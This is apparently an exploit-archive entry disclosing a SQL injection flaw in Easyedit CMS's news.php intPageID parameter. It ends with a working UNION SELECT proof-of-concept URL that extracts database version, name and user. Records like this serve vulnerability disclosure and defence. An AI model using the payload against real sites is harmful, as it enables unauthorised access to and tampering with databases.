[] NeoSense

Easyedit CMS - 'news.php?intPageID' SQL Injection

Author: d3v1l
type: webapps
platform: php
port: 
date_added: 2008-11-19 
date_updated: 2014-03-30 
verified: 1 
codes: OSVDB-50015 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/32369/info

Easyedit is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/news.php?intPageID=-1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user())--